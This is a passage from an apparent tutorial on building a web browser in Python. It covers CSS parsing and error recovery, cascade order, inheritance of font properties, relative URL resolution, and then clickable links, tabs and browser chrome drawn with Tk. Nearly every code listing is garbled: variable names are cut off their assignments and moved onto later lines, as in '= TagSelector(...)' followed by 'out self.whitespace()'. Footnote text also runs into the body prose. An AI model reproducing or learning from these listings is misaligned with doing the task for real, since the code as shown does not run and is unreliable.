) or an identifier
selector (like #signup
) is mis-parsed as a tag name
selector. But that won’t cause any harm since there aren’t any elements
with those tags.
def selector(self):
= TagSelector(self.word().lower())
out self.whitespace()
while self.i < len(self.s) and self.s[self.i] != "{":
= self.word()
tag = TagSelector(tag.lower())
descendant = DescendantSelector(out, descendant)
out self.whitespace()
return out
A CSS file is just a sequence of selectors and blocks:
def parse(self):
= []
rules while self.i < len(self.s):
self.whitespace()
= self.selector()
selector self.literal("{")
self.whitespace()
= self.body()
body self.literal("}")
rules.append((selector, body))return rules
Once again, let’s pause to think about error handling. First, when we
call body
while parsing CSS, we need it to stop when it
reaches a closing brace:
def body(self):
# ...
while self.i < len(self.s) and self.s[self.i] != "}":
try:
# ...
except Exception:
= self.ignore_until([";", "}"])
why if why == ";":
self.literal(";")
self.whitespace()
else:
break
# ...
Second, there might also be an parse error while parsing a selector. In that case, we want to skip the whole rule:
def parse(self):
# ...
while self.i < len(self.s):
try:
# ...
except Exception:
= self.ignore_until(["}"])
why if why == "}":
self.literal("}")
self.whitespace()
else:
break
# ...
Error handling is hard to get right, so make sure to test your parser, just like the HTML parser two chapters back. Here are some errors you might run into:
If the output is missing some rules or properties, it’s probably
a bug being hidden by error handling. Remove some try
blocks and see if the error in question can be fixed.
If you’re seeing extra rules or properties that are mangled
versions of the correct ones, you probably forgot to update
i
somewhere.
If you’re seeing an infinite loop, check whether the
error-handling code always increases i
. Each parsing
function (except whitespace
) should always increment
i
.
You can also add a print
statement to the start and
endIf you print an open
parenthesis at the start of the function and a close parenthesis at the
end, you can use your editor’s “jump to other parenthesis” feature to
skip through output quickly. of each parsing function with
the name of the parsing function,If you also add the right number of spaces to each line
it’ll be a lot easier to read. Don’t neglect debugging niceties like
this! the index i
,It can be especially helpful
to print, say, the 20 characters around index i
from the
string. and the parsed data. It’s a lot of output, but
it’s a sure-fire way to find really complicated bugs.
A parser receives arbitrary bytes as input, so parser bugs are usually easy for bad actors to exploit. Parser correctness is thus crucial to browser security, as many parser bugs have demonstrated. Nowadays browser developers use fuzzing to try to find and fix such bugs.
With the parser debugged, the next step is applying the parsed style sheet to the web page. Since each CSS rule can style many elements on the page, this will require looping over all elements and all rules. When a rule applies, its property/values pairs are copied to the element’s style information:
def style(node, rules):
# ...
for selector, body in rules:
if not selector.matches(node): continue
for property, value in body.items():
property] = value node.style[
Make sure to put this loop before the one that parses the
style
attribute: the style
attribute should
override style sheet values.
To try this out, we’ll need a style sheet. Every browser ships with a browser style sheet,Technically called a “User Agent” style sheet. User Agent, like the Memex. which defines its default styling for the various HTML elements. For our browser, it might look like this:
background-color: gray; } pre {
Let’s store that in a new file, browser.css
, and have
our browser read it when it starts:
class Browser:
def __init__(self):
# ...
with open("browser.css") as f:
self.default_style_sheet = CSSParser(f.read()).parse()
Now, when the browser loads a web page, it can apply that default style sheet to set up its default styling for each element:
def load(self, url):
# ...
= self.default_style_sheet.copy()
rules self.nodes, rules)
style(# ...
The browser style sheet is the default for the whole web. But each
web site can also use CSS to set a consistent style for the whole site.
by referencing CSS files using link
elements:
<link rel="stylesheet" href="/main.css">
The mandatory rel
attribute identifies this link as a
style sheetFor browsers,
stylesheet
is the most important kind
of link, but there’s also preload
for loading assets
that a page will use later and icon
for identifying
favicons. Search engines also use these links; for example,
rel=canonical
names the “true name” of a page and search
engines use it to track pages that appear at multiple
URLs. and the href
attribute has the style
sheet URL. We need to find all these links, download their style sheets,
and apply them.
Since we’ll be doing similar tasks in the next few chapters, let’s generalize a bit and write a recursive function that turns a tree into a list of nodes:
def tree_to_list(tree, list):
list.append(tree)
for child in tree.children:
list)
tree_to_list(child, return list
I’ve written this helper to work on both HTML and layout tree, for
later. We can use tree_to_list
with a Python list
comprehensionIt’s kind
of crazy, honestly, that Python lets you write things like this—crazy,
but very convenient! to grab the URL of each linked style
sheet:
def load(self, url):
# ...
= [node.attributes["href"]
links for node in tree_to_list(self.nodes, [])
if isinstance(node, Element)
and node.tag == "link"
and "href" in node.attributes
and node.attributes.get("rel") == "stylesheet"]
# ...
Now, these style sheet URLs are usually not full URLs; they are something called relative URLs, such as:There are other flavors, including query-relative and scheme-relative URLs, that I’m skipping.
To download the style sheets, we’ll need to convert each relative URL into a full URL:
class URL:
def resolve(self, url):
if "://" in url: return URL(url)
if not url.startswith("/"):
dir, _ = self.path.rsplit("/", 1)
while url.startswith("../"):
= url.split("/", 1)
_, url if "/" in dir:
dir, _ = dir.rsplit("/", 1)
= dir + "/" + url
url return URL(self.scheme + "://" + self.host + \
":" + str(self.port) + url)
Note the logic for handling ..
in the relative URL; for
whatever reason, this is handled by the browser, not the server.
Now the browser can request each linked style sheet and add its rules
to the rules
list:
def load(self, url):
# ...
for link in links:
try:
= url.resolve(link).request()
header, body except:
continue
rules.extend(CSSParser(body).parse())
The try
/except
ignores style sheets that
fail to download, but it can also hide bugs in your code, so if
something’s not right try removing it temporarily.
Each browser has its own browser style sheet (Chromium, Safari, Firefox). Reset style sheets are often used to overcome any differences. This works because web page style sheets take precedence over the browser style sheet, just like in our browser, though real browsers fiddle with priorities to make that happen.Our browser style sheet only has tag selectors in it, so just putting them first works well enough. But if the browser style sheet had any descendant selectors, we’d encounter bugs.
A web page can now have any number of style sheets applied to it. And since two rules can apply to the same element, rule order matters: it determines which rules take priority, and when one rule overrides another.
In CSS, the correct order is called cascade order, and it is based on the rule’s selector, with file order as a tie breaker. This system allows more specific rules to override more general ones, so that you can have a browser style sheet, a site-wide style sheet, and maybe a special style sheet for a specific web page, all co-existing.
Since our browser only has tag selectors, our cascade order just counts them:
class TagSelector:
def __init__(self, tag):
# ...
self.priority = 1
class DescendantSelector:
def __init__(self, ancestor, descendant):
# ...
self.priority = ancestor.priority + descendant.priority
Then our cascade order for rules is just those priorities:
def cascade_priority(rule):
= rule
selector, body return selector.priority
Now when we call style
, we need to sort the rules, like
this:
def load(self, url):
# ...
self.nodes, sorted(rules, key=cascade_priority))
style(# ...
Note that before sorting rules
, it is in file order.
Since Python’s sorted
function keeps the relative order of
things when possible, file order thus acts as a tie breaker, as it
should.
That’s it: we’ve added CSS to our web browser! I mean—for background
colors. But there’s more to web design than that. For example, if you’re
changing background colors you might want to change foreground colors as
well—the CSS color
property. But there’s a catch:
color
affects text, and there’s no way to select a text
node. How can that work?
Web pages can also supply alternative style sheets, and some browsers provide (obscure) methods to switch from the default to an alternate style sheet. The CSS standard also allows for user styles that set custom style sheets for websites, with a priority between browser and website-provided style sheets.
The way text styles work in CSS is called inheritance. Inheritance means that if some node doesn’t have a value for a certain property, it uses its parent’s value instead. That includes text nodes. Some properties are inherited and some aren’t; it depends on the property. Background color isn’t inherited, but text color and other font properties are.
Let’s implement inheritance for four font properties:
color
, font-weight
(normal
or
bold
), font-style
(normal
or
italic
), and font-size
(a length or
percentage).
Let’s start by listing our inherited properties and their default values:
= {
INHERITED_PROPERTIES "font-size": "16px",
"font-style": "normal",
"font-weight": "normal",
"color": "black",
}
We’ll then add the actual inheritance code to the style
function. It has to come before the other loops, since explicit
rules should override inheritance:
def style(node, rules):
# ...
for property, default_value in INHERITED_PROPERTIES.items():
if node.parent:
property] = node.parent.style[property]
node.style[else:
property] = default_value
node.style[# ...
Inheriting font size comes with a twist. Web pages can use
percentages as font sizes: h1 { font-size: 150% }
makes
headings 50% bigger than surrounding text. But what if you had, say, a
code
element inside an h1
tag—would that
inherit the 150%
value for font-size
? Surely
it shouldn’t be another 50% bigger than the rest of the heading
text?
So, in fact, browsers resolve percentages to absolute pixel units
before storing them in the style
and before those values
are inherited; it’s called a “computed style”.Full CSS is a bit more
confusing: there are specified,
computed, used, and actual values, and they affect lots of CSS
properties besides font-size
. We’re just not implementing
those other properties in this book. Of the properties our
toy browser supports, only font-size
needs to be computed
in this way:
def style(node, rules):
# ...
if node.style["font-size"].endswith("%"):
# ...
for child in node.children:
style(child, rules)
Resolving percentage sizes has just one tricky edge case: percentage
sizes for the root html
element. In that case the
percentage is relative to the default font size:This code has to parse and
unparse font sizes because our style
field stores strings;
in a real browser the computed style is stored parsed so this doesn’t
have to happen.
def style(node, rules):
# ...
if node.style["font-size"].endswith("%"):
if node.parent:
= node.parent.style["font-size"]
parent_font_size else:
= INHERITED_PROPERTIES["font-size"]
parent_font_size = float(node.style["font-size"][:-1]) / 100
node_pct = float(parent_font_size[:-2])
parent_px "font-size"] = str(node_pct * parent_px) + "px" node.style[
Note that this happens after all of the different sources of style
values are handled (so we are working with the final
font-size
value) but before we recurse (so children can
assume our font-size
has been resolved to a pixel
value).
Styling a page can be slow, so real browsers apply tricks like bloom filters for descendant selectors, indices for simple selectors, and various forms of sharing and parallelism. Some types of sharing are also important to reduce memory usage—computed style sheets can be huge!
So now with all these font properties implemented, let’s change layout to use them! That will let us move our default text styles to the browser style sheet:
color: blue; }
a { font-style: italic; }
i { font-weight: bold; }
b { font-size: 90%; }
small { font-size: 110%; } big {
The browser looks up font information in BlockLayout
’s
word
method; we’ll need to change it to use the node’s
style
field, and for that, we’ll need to pass in the node
itself:
class BlockLayout:
def recurse(self, node):
if isinstance(node, Text):
for word in node.text.split():
self.word(node, word)
else:
# ...
def word(self, node, word):
= self.get_font(node)
font # ...
Here, the get_font
method is a simple wrapper around our
font cache:
class BlockLayout:
def get_font(self, node):
= node.style["font-weight"]
weight = node.style["font-style"]
style if style == "normal": style = "roman"
= int(float(node.style["font-size"][:-2]) * .75)
size return get_font(size, weight, style)
Note that for font-style
we need to translate CSS
“normal” to Tk “roman” and for font-size
we need to convert
CSS pixels to Tk points.
Text color requires a bit more plumbing. First, we have to read the
color and store it in the current line
:
def word(self, node, word):
= node.style["color"]
color # ...
self.line.append((self.cursor_x, word, font, color))
# ...
The flush
method then copies it from line
to display_list
:
def flush(self):
# ...
= [font.metrics() for x, word, font, color in self.line]
metrics # ...
for x, word, font, color in self.line:
# ...
self.display_list.append((x, y, word, font, color))
# ...
That display_list
is converted to drawing commands in
paint
:
def paint(self, display_list):
# ...
for x, y, word, font, color in self.display_list:
self.x + x, self.y + y,
display_list.append(DrawText( word, font, color))
DrawText
now needs a color
argument, and
needs to pass it to create_text
’s fill
parameter:
class DrawText:
def __init__(self, x1, y1, text, font, color):
# ...
self.color = color
def execute(self, scroll, canvas):
canvas.create_text(# ...
=self.color,
fill )
Phew! That was a lot of coordinated changes, so test everything and
make sure it works. You should now see links on this page appear in
blue—and you might also notice that the rest of the text has become
slightly lighter.The
book’s main body text is colored
#333
, or roughly 97% black after gamma
correction. Also, now that we’re explicitly setting
the text color, we should explicitly set the background color as
well:My Linux machine
sets the default background color to a light gray, while my macOS laptop
has a “Dark Mode” where the default background color becomes a dark
gray. Setting the background color explicitly avoids the browser looking
strange in these situations.
class Browser:
def __init__(self):
# ...
self.canvas = tkinter.Canvas(
# ...
="white",
bg
)# ...
These changes obsolete all the code in BlockLayout
that
handles specific tags, like the style
, weight
,
and size
properties and the open_tag
and
close_tag
methods. Let’s refactor a bit to get rid of
them:
def recurse(self, node):
if isinstance(node, Text):
for word in node.text.split():
self.word(node, word)
else:
if node.tag == "br":
self.flush()
for child in node.children:
self.recurse(child)
Styling not only lets web page authors style their own web pages; it also moves browser code to a simple style sheet. And that’s a big improvement: the style sheet is simpler and easier to edit. Sometimes converting code to data like this means maintaining a new format, but browsers get to reuse a format, CSS, they need to support anyway.
Usually a point is one 72nd of an inch while pixel size depends on the screen, but CSS instead defines an inch as 96 pixels, because that was once a common screen resolution. And these CSS pixels need not be physical pixels! Seem weird? OS internals are equally bizarre, let alone traditional typesetting.
This chapter implemented a rudimentary but complete styling engine, including downloading, parsing, matching, sorting, and applying CSS files. That means we:
style
attributes and
link
ed CSS files;BlockLayout
to move the font properties to
CSS;Our styling engine is also relatively easy to extend with properties and selectors.
The complete set of functions, classes, and methods in our browser should now look something like this:
class URL:
def __init__(url)
def request()
def resolve(url)
WIDTH
HEIGHT
FONTS
def get_font(size, weight, slant)
class Text:
def __init__(text, parent)
def __repr__()
class Element:
def __init__(tag, attributes, parent)
def __repr__()
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
BLOCK_ELEMENTS
class DrawRect:
def __init__(x1, y1, x2, y2, color)
def execute(scroll, canvas)
def __repr__()
class DrawText:
def __init__(x1, y1, text, font, color)
def execute(scroll, canvas)
def __repr__()
class BlockLayout:
def __init__(node, parent, previous)
def token(tok)
def word(node, word)
def flush()
def recurse(node)
def open_tag(tag)
def close_tag(tag)
def layout()
def layout_mode()
def paint(display_list)
def get_font(node)
def __repr__()
class DocumentLayout:
def __init__(node)
def layout()
def paint(display_list)
def __repr__()
class Browser:
def __init__()
def load(url)
def draw()
def scrolldown(e)
def tree_to_list(tree, list)
class CSSParser:
def __init__(s)
def whitespace()
def literal(literal)
def word()
def pair()
def ignore_until(chars)
def body()
def selector()
def parse()
class TagSelector:
def __init__(tag)
def matches(node)
def __repr__()
class DescendantSelector:
def __init__(ancestor, descendant)
def matches(node)
def __repr__()
INHERITED_PROPERTIES
def style(node, rules)
def cascade_priority(rule)
if __name__ == "__main__"
Fonts: Implement the font-family
property, an
inheritable property that names which font should be used in an element.
Make text inside <code>
elements use a nice
monospaced font like Courier
. Beware the font cache.
Width/Height: Add support to block layout objects for the
width
and height
properties. These can either
be a pixel value, which directly sets the width or height of the layout
object, or the word auto
, in which case the existing layout
algorithm is used.
Class Selectors: Any HTML element can have a
class
attribute, whose value is a space-separated list of
that element’s classes. A CSS class selector, like .main
,
affects all elements with the main
class. Implement class
selectors; give them priority 10. If you’ve implemented them correctly,
the code blocks in this book should be syntax-highlighted.
Display: Right now, the layout_mode
function
relies on a hard-coded list of block elements. In a real browser, the
display
property controls this. Implement
display
with a default value of inline
, and
move the list of block elements to the browser style sheet.
Shorthand Properties: CSS “shorthand properties” set
multiple related CSS properties at the same time; for example,
font: italic bold 100% Times
sets the
font-style
, font-weight
,
font-size
, and font-family
properties all at
once. Add shorthand properties to your parser. (If you haven’t
implemented font-family
, just ignore that part.)
Fast Descendant Selectors: Right now, matching a selector
like div div div div div
can take a long time—it’s
O(nd) in the worst case, where n is the length of the
selector and d is the depth of the layout tree. Modify the
descendant-selector matching code to run in O(n) time. It may
help to have DescendantSelector
store a list of base
selectors instead of just two.
Selector Sequences: Sometimes you want to select an element
by tag and class. You do this by concatenating the selectors
without anything in between.Not even whitespace! For example,
span.announce
selects elements that match both
span
and .announce
. Implement a new
SelectorSequence
class to represent these and modify the
parser to parse them. Sum priorities.Priorities for SelectorSequence
s are supposed
to compare the number of ID, class, and tag selectors in lexicographic
order, but summing the priorities of the selectors in the sequence will
work fine as long as no one strings more than 16 selectors
together.
Important: a CSS property-value pair can be marked
“important” using the !important
syntax, like this:
#banner a { color: black !important; }
This gives that property-value pair (but not other pairs in the same
block!) a higher priority than any other selector (except for other
!important
selector). Parse and implement
!important
, giving any property-value pairs marked this way
a priority 10000 higher than normal property-value pairs.
Ancestor Selectors: An ancestor selector is the inverse of a
descendant selector—it styles an ancestor according to the presence of a
descendant. This feature is one of the benefits provided by the :has
syntax. Try to implement ancestor selectors. As I write this, no
browser has actually implemented :has
; why do you think
that is? Hint: analyze the asymptotic speed of your implementation.
There is a clever implementation that is O(1) amortized per
element—can you find it?No, this clever implementation is still not fast enough for
real browsers to implement.
Inline Style Sheets: The link rel=stylesheet
syntax allows importing an external style sheet (meaning one loaded via
its own HTTP request). There is also a way to provide a style sheet
inline, as part of the HTML, via the <style>
tag—everything up to the following </style>
tag is
interpreted as a style sheet.Inline style sheets should apply after all external style
sheets in the cascade, and apply in order of their position in the
HTML. Inline style sheets are useful for creating
self-contained example web pages, but more importantly are a way that
web sites can load faster by reducing the number of round-trip network
requests to the server. Since style sheets typically don’t contain left
angle brackets, you can implement this feature without modifying the
HTML parser.
Our toy browser is still missing the key insight of hypertext: documents linked together by hyperlinks. It lets us watch the waves, but not surf the web. So in this chapter, we’ll implement hyperlinks, an address bar, and the rest of the browser interface—the part of the browser that decides which page we are looking at.
The core of the web is the link, so the most important part of the browser interface is clicking on links. But before we can quite get to clicking on links, we first need to answer a more fundamental question: where on the screen are the links? Though paragraphs and headings have their sizes and positions recorded in the layout tree, formatted text (like links) does not. We need to fix that.
The big idea is to introduce two new types of layout objects:
LineLayout
and TextLayout
.
BlockLayout
will now have LineLayout
children
for each line of text, which themselves will contain a
TextLayout
for each word in that line. These new classes
can make the layout tree look different from the HTML tree. So to avoid
surprises, let’s look at a simple example:
<html>
<body>
Here is some text that is<br>
spread across multiple lines</body>
</html>
The text in the body
element wraps across two lines
(because of the br
element), so the layout tree will have
this structure:
DocumentLayout
BlockLayout[block] (html element)
BlockLayout[inline] (body element)
LineLayout (first line of text)
TextLayout ("Here")
TextLayout ("is")
TextLayout ("some")
TextLayout ("text")
TextLayout ("that")
TextLayout ("is")
LineLayout (second line of text)
TextLayout ("spread")
TextLayout ("across")
TextLayout ("multiple")
TextLayout ("lines")
Note how one body
element corresponds to two
LineLayout
s, and how two text nodes turn into a total of
ten TextLayout
s!
Let’s get started. Defining LineLayout
is
straightforward:
class LineLayout:
def __init__(self, node, parent, previous):
self.node = node
self.parent = parent
self.previous = previous
self.children = []
TextLayout
is only a little more tricky. A single
TextLayout
refers not to a whole HTML node but to a
specific word. That means TextLayout
needs an extra
argument to know which word that is:
class TextLayout:
def __init__(self, node, word, parent, previous):
self.node = node
self.word = word
self.children = []
self.parent = parent
self.previous = previous
Like the other layout modes, LineLayout
and
TextLayout
will need their own layout
and
paint
methods, but before we get to those we need to think
about how the LineLayout
and TextLayout
objects will be created. That happens during word wrapping.
Let’s review how word wrapping works right
now. BlockLayout
is responsible for word wrapping, inside
its text
method. That method updates a line
field, which stores all the words in the current line. When it’s time to
go to the next line, it calls flush
, which computes the
location of the line and each word in it, and adds all the words to a
display_list
field, which stores all the words in the whole
inline element.
Inside the text
method, this key line adds a word to the
current line of text:
self.line.append((self.cursor_x, word, font, color))
We now want to create a TextLayout
object and add it to
a LineLayout
object. The LineLayout
s are
children of the BlockLayout
, so the current line can be
found at the end of the children
array:
= self.children[-1]
line = TextLayout(node, word, line, self.previous_word)
text
line.children.append(text)self.previous_word = text
Note that I needed a new field here, previous_word
, to
keep track of the previous word in the current line. So we’ll need to
initialize it later.
Now let’s think about what happens when we reach the end of the line.
The current code calls flush
, which does stuff like
positioning text and clearing the line
field. We don’t want
to do all that—we just want to create a new LineLayout
object. So let’s use a different method for that:
if self.cursor_x + w > self.width:
self.new_line()
This new_line
method just creates a new line and resets
some fields:
def new_line(self):
self.previous_word = None
self.cursor_x = 0
= self.children[-1] if self.children else None
last_line = LineLayout(self.node, self, last_line)
new_line self.children.append(new_line)
Now there’s a lot of fields we’re not using. Let’s clean them up. In
the core layout
method, we don’t need to initialize the
display_list
or cursor_y
or line
fields, since we won’t be using any of those any more. Instead, we just
need to call new_line
and recurse
:
def layout(self):
# ...
else:
self.new_line()
self.recurse(self.node)
The layout
method already recurses into its children to
lay them out, so that part doesn’t need any change. And moreover, we can
now compute the height of a paragraph of text by summing the height of
its lines, so this part of the code no longer needs to be different
depending on the layout mode:
def layout(self):
# ...
self.height = sum([child.height for child in self.children])
With the display_list
gone, we can also remove the part
of paint
that handles it. Painting all the lines in a
paragraph is now just automatically handled by recursing into the child
layout objects. So by adding LineLayout
and
TextLayout
we made BlockLayout
quite a bit
simpler and shared more code between block and inline layout modes.
You might also be tempted to delete the flush
method,
since it’s no longer called from anywhere. But keep it around for just a
moment—we’ll need it to write the layout
method for line
and text objects.
The layout objects generated by a text node need not even be consecutive. English containing a Farsi quotation, for example, can flip from left-to-right to right-to-left in the middle of a line. The text layout objects end up in a surprising order. And then there are languages laid out vertically…
We’re now creating line and text objects, but we still need to lay
them out. Let’s start with lines. Lines stack vertically and take up
their parent’s full width, so computing x
and
y
and width
looks the same as for our other
boxes:You could reduce
the duplication with some helper methods (or even something more
elaborate, like mixin classes), but in a real browser different layout
modes support different kinds of extra features (like text direction or
margins) and the code looks quite different.
class LineLayout:
def layout(self):
self.width = self.parent.width
self.x = self.parent.x
if self.previous:
self.y = self.previous.y + self.previous.height
else:
self.y = self.parent.y
# ...
Computing height, though, is different—this is where all that logic
to compute maximum ascents, maximum descents, and so on from the old
comes in. We’ll want to pilfer the code from the old flush
method. First, let’s lay out each word:
# ...
for word in self.children:
word.layout()
Next, we need to compute the line’s baseline based on the maximum
ascent and descent, using basically the same code as the old
flush
method:
# ...
= max([word.font.metrics("ascent")
max_ascent for word in self.children])
= self.y + 1.25 * max_ascent
baseline for word in self.children:
= baseline - word.font.metrics("ascent")
word.y = max([word.font.metrics("descent")
max_descent for word in self.children])
Note that this code is reading from a font
field on each
word and writing to each word’s y
field.The y
position
could have been computed in TextLayout
’s
layout
method—but then that layout method would have to
come after the baseline computation, not before. Yet
font
must be computed before the baseline
computation. A real browser might resolve this paradox with multi-phase
layout. There are many considerations and optimizations of this kind
that are needed to make text layout super fast. That means
that inside TextLayout
’s layout
method, we
need to compute x
, width
, and
height
, but also font
, and not y
.
Remember that for later.
Finally, since each line is now a standalone layout object, it needs to have a height. We compute it from the maximum ascent and descent:
# ...
self.height = 1.25 * (max_ascent + max_descent)
Ok, so that’s line layout. Now let’s think about laying out each
word. Recall that there’s a few quirks here: we need to compute a
font
field for each TextLayout
, but we do not
need to compute a y
field.
We can compute font
using the same font-construction
code as in BlockLayout
:
class TextLayout:
def layout(self):
= self.node.style["font-weight"]
weight = self.node.style["font-style"]
style if style == "normal": style = "roman"
= int(float(self.node.style["font-size"][:-2]) * .75)
size self.font = get_font(size, weight, style)
Next, we need to compute word’s size and x
position. We
use the font metrics to compute size, and stack words left to right to
compute position.
class TextLayout:
def layout(self):
# ...
# Do not set self.y!!!
self.width = self.font.measure(self.word)
if self.previous:
= self.previous.font.measure(" ")
space self.x = self.previous.x + space + self.previous.width
else:
self.x = self.parent.x
self.height = self.font.metrics("linespace")
So that’s layout
for LineLayout
and
TextLayout
. All that’s left is painting. For
LineLayout
we just recurse:
class LineLayout:
def paint(self, display_list):
for child in self.children:
child.paint(display_list)
And each TextLayout
creates a single
DrawText
call:
class TextLayout:
def paint(self, display_list):
= self.node.style["color"]
color
display_list.append(self.x, self.y, self.word, self.font, color)) DrawText(
So, oof, well, this was quite a bit of refactoring. Take a moment to test everything—it should look exactly identical to how it did before we started this refactor. But while you can’t see it, there’s a crucial difference: each blue link on the page now has an associated layout object and its own size and position.
Actually, text rendering is way more complex than this. Letters can transform and overlap, and the user might want to color certain letters—or parts of letters—a different color. All of this is possible in HTML, and browsers implement support for it.
Now that the browser knows where the links are, we start work on
clicking them. In Tk, clicks work just like key presses: you bind an
event handler to a certain event. For click handling that event is
<Button-1>
, button number 1 being the left button on
the mouse.Button 2 is
the middle button; button 3 is the right-hand button.
class Browser:
def __init__(self):
# ...
self.window.bind("<Button-1>", self.click)
Inside click
, we want to figure out what link the user
has clicked on. Luckily, the event handler is passed an event object,
whose x
and y
fields refer to where the click
happened:
class Browser:
def click(self, e):
= e.x, e.y x, y
Now, here, we have to be careful with coordinate systems. Those x and y coordinates are relative to the browser window. Since the canvas is in the top-left corner of the window, those are also the x and y coordinates relative to the canvas. We want the coordinates relative to the web page, so we need to account for scrolling:
class Browser:
def click(self, e):
# ...
+= self.scroll y
The next step is to figure out what links or other elements are at that location. To do that, search through the tree of layout objects:
# ...
= [obj for obj in tree_to_list(self.document, [])
objs if obj.x <= x < obj.x + obj.width
and obj.y <= y < obj.y + obj.height]
Now, normally when you click on some text, you’re also clicking on
the paragraph it’s in, and the section that that paragraph is in, and so
on. We want the one that’s “on top”, which is the last object in the
list:In a real browser,
sibling elements can also overlap each other, like a dialog that
overlaps some text. Web pages can control which sibling is on top using
the z-index
property. So real browsers have to compute stacking
contexts to resolve what you actually clicked on.
# ...
if not objs: return
= objs[-1].node elt
This elt
node is the most specific node that was
clicked. With a link, that’s usually going to be a text node. But since
we want to know the actual URL the user clicked on, we need to climb
back up the HTML tree to find the link element:
# ...
while elt:
if isinstance(elt, Text):
pass
elif elt.tag == "a" and "href" in elt.attributes:
# ...
= elt.parent elt
I wrote this in a kind of curious way so it’s easy to add other types of clickable things—like text boxes and buttons—in the next chapter.
Once we find the link element itself, we need to extract the URL and load it:
# ...
elif elt.tag == "a" and "href" in elt.attributes:
= self.url.resolve(elt.attributes["href"])
url return self.load(url)
Note that when a link has a relative URL, that URL is resolved
relative to the current page, so store the current URL in
load
:
class Browser:
def __init__(self):
# ...
self.url = None
def load(self, url):
self.url = url
# ...
Try it out! You should now be able to click on links and navigate to new web pages.
On mobile devices, a “click” happens over an area, not just at a single point. Since mobile “taps” are often pretty inaccurate, click should use the area information for “hit testing”. This can happen even with a normal mouse click when the click is on a rotated or scaled element.
If you’re anything like me, the next thing you tried after clicking on links is middle-clicking them to open in a new tab. Every browser now has tabbed browsing, and honestly it’s a little embarrassing that our little toy browser doesn’t.Back in the day, browser tabs were the feature that would convince friends and relatives to switch from IE 6 to Firefox.
Fundamentally, tabbed browsing means distinguishing between the browser itself and tabs that show individual web pages. The canvas the browser draws to, for example, is shared by all web pages, but the layout tree and display list are specific to one page. We need to tease these two types of things apart.
Here’s the plan: the Browser
class will store the window
and canvas, plus a list of Tab
objects, one per browser
tab. Everything else goes into a new Tab
class. Since the
Browser
stores the window and canvas, it handles all of the
events, sometimes forwarding it to the active tab.
Since the Tab
class is responsible for layout, styling,
and painting, the default style sheet moves to the Tab
constructor:
class Tab:
def __init__(self):
with open("browser.css") as f:
self.default_style_sheet = CSSParser(f.read()).parse()
The load
, scrolldown
, click
,
and draw
methods also move to Tab
, since
that’s now where all web-page-specific data lives.
But since the Browser
controls the canvas and handles
events, it decides when rendering happens and which tab does the
drawing. After all,Unless the browser implements multiple windows, of
course. you only want one tab drawing its contents at a
time! So let’s remove the draw
calls from the
load
and scrolldown
methods, and in
draw
, let’s pass the canvas in as an argument:
class Tab:
def draw(self, canvas):
# ...
Let’s also make draw
not clear the screen. That should
be the Browser
’s job.
Now let’s turn to the Browser
class. It has to store a
list of tabs and an index into that list for the active tab:
class Browser:
def __init__(self):
# ...
self.tabs = []
self.active_tab = None
When it comes to user interaction, think of the Browser
as “active” and the Tab
as “passive”. It’s the job of the
Browser
is to call into the tabs as appropriate. So the
Browser
handles all events:
class Browser:
def __init__(self):
self.window.bind("<Down>", self.handle_down)
self.window.bind("<Button-1>", self.handle_click)
Since these events need page-specific information to resolve, these handler methods just forward the event to the active tab:
class Browser:
def handle_down(self, e):
self.tabs[self.active_tab].scrolldown()
self.draw()
def handle_click(self, e):
self.tabs[self.active_tab].click(e.x, e.y)
self.draw()
You’ll need to tweak the Tab
’s scrolldown
and click
methods:
scrolldown
now takes no arguments (instead of an event
object)click
now take two coordinates (instead of an event
object)Finally, the Browser
’s draw
call also calls
into the active tab:
class Browser:
def draw(self):
self.canvas.delete("all")
self.tabs[self.active_tab].draw(self.canvas)
This only draws the active tab, which is how tabs are supposed to work.
We’re basically done splitting Tab
from
Browser
, and after a refactor like this we need to test
things. To do that, we’ll need to create at least one tab, like
this:
class Browser:
def load(self, url):
= Tab()
new_tab
new_tab.load(url)self.active_tab = len(self.tabs)
self.tabs.append(new_tab)
self.draw()
Of course, we need a way for the user to switch tabs, create new ones, and so on. Let’s turn to that next.
Browser tabs first appeared in SimulBrowse, which was a kind of custom UI for the Internet Explorer engine. SimulBrowse (later renamed to NetCaptor) also had ad blocking and a private browsing mode. The old advertisements are a great read!
Real web browsers don’t just show web page contents—they’ve got
labels and icons and buttons.Oh my! This is called the browser
“chrome”;Yep, that
predates and inspired the name of Google’s Chrome browser.
all of this stuff is drawn by the browser to the same window as the page
contents, and it requires information about the browser as a whole (like
the list of all tabs), so it has to happen in the Browser
class.
Much like tabs, the browser chrome is going to generate a display list and then draw it to the canvas. However, unlike tabs, this display list will always be drawn at the top of the window and won’t be scrolled:
class Browser:
def draw(self):
# ...
for cmd in self.paint_chrome():
0, self.canvas) cmd.execute(
The paint_chrome
method constructs the display list for
the browser chrome; I’m just constructing and using it directly, instead
of storing it somewhere, because our browser will have pretty simple
chrome, meaning paint_chrome
will be fast. In a real
browser, it might be saved and only updated when the chrome changes.
First things first: we need to avoid drawing page contents to the part of the browser window where the tab bar goes. Let’s reserve some space for the browser chrome—100 pixels, say:
= 100 CHROME_PX
Each tab needs to make sure not to draw to those pixels:
class Tab:
def draw(self, canvas):
for cmd in self.display_list:
if cmd.top > self.scroll + HEIGHT - CHROME_PX: continue
if cmd.bottom < self.scroll: continue
self.scroll - CHROME_PX, canvas) cmd.execute(
There are still sometimes going to be halves of letters that stick out into the browser chrome, but we can hide them by just drawing over them:
class Browser:
def paint_chrome(self):
= []
cmds 0, 0, WIDTH, CHROME_PX, "white"))
cmds.append(DrawRect(return cmds
You’ll also need to adjust scrolldown
to account for the
height of the page content now being
HEIGHT - CHROME_PX
:
class Tab:
def scrolldown(self):
= max(self.document.height - (HEIGHT - CHROME_PX), 0)
max_y self.scroll = min(self.scroll + SCROLL_STEP, max_y)
To better separate the chrome from the page, let’s also add a border:
class Browser:
def paint_chrome(self):
# ...
0, 0, WIDTH, CHROME_PX, "white"))
cmds.append(DrawRect(0, CHROME_PX - 1, WIDTH, CHROME_PX - 1, "black", 1))
cmds.append(DrawLine(# ...
The DrawLine
command draws a line of a given color and
thickness. It’s defined like so:
class DrawLine:
def __init__(self, x1, y1, x2, y2, color, thickness):
self.top = y1
self.left = x1
self.bottom = y2
self.right = x2
self.color = color
self.thickness = thickness
def execute(self, scroll, canvas):
canvas.create_line(self.left, self.top - scroll,
self.right, self.bottom - scroll,
=self.color, width=self.thickness,
fill )
